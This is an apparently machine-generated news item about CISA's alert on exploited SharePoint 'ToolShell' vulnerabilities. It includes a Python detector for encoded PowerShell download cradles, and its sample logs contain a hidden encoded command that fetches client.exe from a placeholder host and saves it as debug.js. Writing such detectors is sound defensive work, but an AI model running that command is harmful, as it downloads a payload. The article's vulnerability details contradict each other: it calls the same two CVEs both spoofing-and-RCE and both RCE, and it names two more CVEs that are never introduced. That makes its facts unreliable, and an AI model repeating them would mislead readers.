Ethical Hacking News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert, urging federal civilian executive branch agencies to remediate two critical vulnerabilities in Microsoft SharePoint that have been actively exploited by Chinese hackers. The alert comes after evidence of exploitation was added to the CISA's Known Exploited Vulnerabilities (KEV) catalog on July 22, 2025.
The two vulnerabilities, CVE-2025-49704 and CVE-2025-49706, are a spoofing vulnerability and a remote code execution vulnerability collectively tracked as ToolShell. The inclusion of these flaws in the KEV catalog was prompted by Microsoft's revelation that Chinese hacking groups like Linen Typhoon and Violet Typhoon leveraged these vulnerabilities to breach on-premises SharePoint servers since July 7, 2025.
According to CISA, the two vulnerabilities are related but distinct. CVE-2025-49704 is a SharePoint remote code execution vulnerability, while CVE-2025-49706 is a SharePoint post-auth remote code execution vulnerability. The fact that CVE-2025-53770 is both an authentication bypass and a remote code execution bug indicates that CVE-2025-53771 is not necessary to build the exploit chain.
The attack chains observed so far entail the exploitation of SharePoint flaws to deploy a web shell that allows threat actors to retrieve and steal MachineKey data. Symantec has identified post-exploitation activity in which adversaries ran an encoded PowerShell command to download a file named "client.exe" from an external server and save it locally as "debug.js".
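A detection check for the post-exploitation step just described, added here as an example that is not from the original article or from Symantec: it decodes -EncodedCommand arguments in constructed process-creation records and flags an encoded download whose remote file is an executable saved under a different extension, noting when the parent is the IIS worker process (assumed here to be the web shell's parent). The host name, file paths and sample records are placeholders, not indicators from the article.

```python
"""Flag encoded PowerShell download cradles like the one described above (an .exe fetched
remotely, written under a script extension) in sample records "<parent process>|<command line>"."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})")
REMOTE = re.compile(r"(?i)https?://[^\s'\"]+?\.(exe|dll|ps1)\b")
LOCAL = re.compile(r"(?i)(?:-OutFile|-o)\b\s+['\"]?([^'\"\s]+)")

def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64/UTF-16LE, e.g. a false hit on -ep
        return None

def classify(parent, cmdline):
    """Return a finding for an encoded download cradle, or None for everything else."""
    script = decode_encoded_command(cmdline)
    remote = REMOTE.search(script) if script else None
    local = LOCAL.search(script) if script else None
    if not (remote and local):
        return None
    remote_ext, local_ext = remote.group(1).lower(), local.group(1).rsplit(".", 1)[-1].lower()
    reason = "encoded download cradle"
    if remote_ext != local_ext:  # the article's pattern: client.exe saved as debug.js
        reason += f"; extension mismatch (.{remote_ext} saved as .{local_ext})"
    if parent.lower() == "w3wp.exe":  # IIS worker spawning PowerShell: web shell indicator
        reason += "; spawned by IIS worker"
    return {"parent": parent, "remote": remote.group(0), "local": local.group(1), "reason": reason}

def scan(lines):
    """Apply classify() to every "parent|cmdline" record and collect the findings."""
    pairs = (line.partition("|") for line in lines)
    return [f for p, _, c in pairs if (f := classify(p.strip(), c.strip()))]

def _enc(script):
    """Base64/UTF-16LE encoding used only to build the constructed sample records below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample telemetry; the host name and paths are placeholders, not real indicators.
SAMPLE_LOGS = [
    "explorer.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "explorer.exe|powershell.exe -EncodedCommand " + _enc("Get-Service -Name W3SVC"),
    "w3wp.exe|powershell.exe -NoP -W Hidden -enc " + _enc(
        "Invoke-WebRequest -Uri http://placeholder.invalid/client.exe -OutFile C:\\Windows\\Temp\\debug.js"),
]
```

Running `scan(SAMPLE_LOGS)` yields one finding, the record spawned by w3wp.exe; the benign encoded administrative command decodes cleanly but carries no download and is not reported.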
Experts have warned that enabling Antimalware Scan Interface (AMSI) instead of patching is a bad idea, as it would allow attackers to bypass this mitigation step. The development comes as watchTowr Labs has internally devised a method exploiting CVE-2025-53770 such that it bypasses AMSI.
The inclusion of these vulnerabilities in the KEV catalog and the subsequent alert from CISA underscore the importance of prioritizing vulnerability remediation in federal agencies. The fact that Chinese hackers have already exploited these vulnerabilities to breach on-premises SharePoint servers highlights the need for agencies to take immediate action.
Microsoft has stated that it assists CISA with the Known Exploited Vulnerabilities Catalog, which provides regularly updated information on exploited vulnerabilities. However, experts argue that this does not excuse federal agencies from their responsibility to remediate identified vulnerabilities promptly.
The CISA alert serves as a reminder of the ongoing threat landscape and the need for organizations to prioritize vulnerability remediation. As the threat landscape continues to evolve, it is essential for organizations to stay vigilant and take proactive steps to address emerging vulnerabilities.
Related Information:
https://www.ethicalhackingnews.com/articles/CISA-Orders-Urgent-Patching-for-SharePoint-Vulnerability-After-Chinese-Hackers-Exploit-Flaws-ehn.shtml
https://thehackernews.com/2025/07/cisa-orders-urgent-patching-after.html
Published: Wed Jul 23 07:29:08 2025 by llama3.2 3B Q4_K_M